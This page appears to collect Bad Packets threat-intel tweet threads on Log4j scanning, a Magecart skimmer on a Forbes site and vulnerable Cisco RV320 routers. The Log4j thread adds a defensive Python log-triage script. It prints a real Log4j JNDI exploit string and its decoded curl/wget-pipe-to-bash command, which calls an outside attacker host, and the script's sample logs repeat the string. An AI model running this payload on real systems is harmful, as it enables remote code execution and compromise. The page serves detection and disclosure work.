Bad Packets by Okta
We provide cyber #threatintel on emerging threats, DDoS botnets, and network abuse.
Dec 10, 2021 41 tweets 13 min read
Mass scanning activity detected from multiple hosts checking for servers using Apache Log4j (Java logging library) vulnerable to remote code execution (github.com/advisories/GHS…).

Query our API for "tags=CVE-2021-44228" for source IP addresses and other IOCs. #threatintel

Example CVE-2021-44228 payload:
${jndi:ldap://80.71.158.12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}

Decoded:
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash

Source IP:
62.76.41.46 (🇷🇺)
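The payload above is a JNDI lookup string whose `/Base64/<...>` path segment carries the command the attacker wants the vulnerable host to run. The following is an added example (not Bad Packets' code or API) of how a defender can triage web-server logs for this pattern: it extracts each `${jndi:...}` lookup, records the callback host and port as an IoC, and decodes the Base64 segment so an analyst can see the command without executing anything. The access-log lines are constructed samples; the first one embeds the exact payload quoted in the thread, and the third carries a malformed Base64 segment to show the decoder failing safely.

```python
import base64
import binascii
import re
from typing import Optional

# Matches a JNDI lookup of the form ${jndi:<scheme>://<host[:port]>[/path]}.
# Only plain, unobfuscated lookups are covered; that is enough for this payload family.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|rmi|dns|iiop)://(?P<host>[^/}\s]+)(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)
# The Base64-encoded command segment used by the quoted payload: /Base64/<b64>
B64_SEG_RE = re.compile(r"/Base64/(?P<b64>[A-Za-z0-9+/]+=*)", re.IGNORECASE)


def decode_b64_segment(path: str) -> Optional[str]:
    """Return the decoded text of a /Base64/<...> path segment, or None if absent or invalid."""
    if not path:
        return None
    m = B64_SEG_RE.search(path)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group("b64"), validate=True)
    except (binascii.Error, ValueError):
        return None  # malformed payloads are still flagged by the caller, just not decoded
    return raw.decode("utf-8", errors="replace")


def find_jndi_lookups(line: str) -> list[dict]:
    """Extract every JNDI lookup in one log line with its callback target and decoded command."""
    findings = []
    for m in JNDI_RE.finditer(line):
        # host:port split; IPv4 addresses and hostnames only (IPv6 literals are not handled here)
        host, _, port = m.group("host").partition(":")
        path = m.group("path") or ""
        findings.append({
            "scheme": m.group("scheme").lower(),
            "host": host,
            "port": int(port) if port.isdigit() else None,
            "path": path,
            "decoded_command": decode_b64_segment(path),
        })
    return findings


def scan_log(lines) -> list[tuple[int, dict]]:
    """Run the extractor over many log lines; returns (line_number, finding) pairs."""
    hits = []
    for n, line in enumerate(lines, 1):
        for f in find_jndi_lookups(line):
            hits.append((n, f))
    return hits


# Constructed sample access-log lines (not real traffic). Line 1 carries the payload quoted
# in the thread in the User-Agent field; line 2 is benign; line 3 has a Base64 segment that
# does not decode, so the lookup is reported but decoded_command stays None.
PAYLOAD = (
    "${jndi:ldap://80.71.158.12:5557/Basic/Command/Base64/"
    "KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}"
)
SAMPLE_LOGS = [
    f'62.76.41.46 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "{PAYLOAD}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:rmi://198.51.100.9:1099/Basic/Command/Base64/AAA}"',
]

if __name__ == "__main__":
    for line_no, f in scan_log(SAMPLE_LOGS):
        print(f"line {line_no}: {f['scheme']}://{f['host']}:{f['port']} -> {f['decoded_command']!r}")
```

The decoded value for the quoted payload is the same `(curl -s ... )|bash` one-liner shown in the thread; the callback host and port (`80.71.158.12:5557`) and the source IP in the log line are the IoCs worth pushing to a blocklist or a SIEM watchlist. Logs are scanned as text only, so the decoder never evaluates what it recovers.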
May 15, 2019 7 tweets 5 min read
⚠️ WARNING ⚠️
@Forbes Magazine subscription website (forbesmagazine.com) is infected with #magecart malware.

Exfil domain: fontsawesome[.]gq (🇧🇬)
@urlscanio results: urlscan.io/result/8630561…
Deobfuscated code: pastebin.com/3AR7wQ70

@Forbes @urlscanio forbesmagazine.com is back online and we've confirmed the malware has been removed.

If you made a purchase on the site while it was compromised, your credit card information was likely stolen.

Jan 27, 2019 4 tweets 4 min read
Our honeypots recently detected opportunistic scanning activity targeting Cisco RV320/RV325 routers. A vulnerability exists in these routers that allows remote unauthenticated users to obtain the device's admin credentials – leading to RCE.
badpackets.net/over-9000-cisc…

Using data provided by @binaryedgeio, we've scanned 15,309 unique IPv4 hosts and determined a total of 9,657 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653.

This interactive map shows the total vulnerable hosts found per country:
docs.google.com/spreadsheets/d…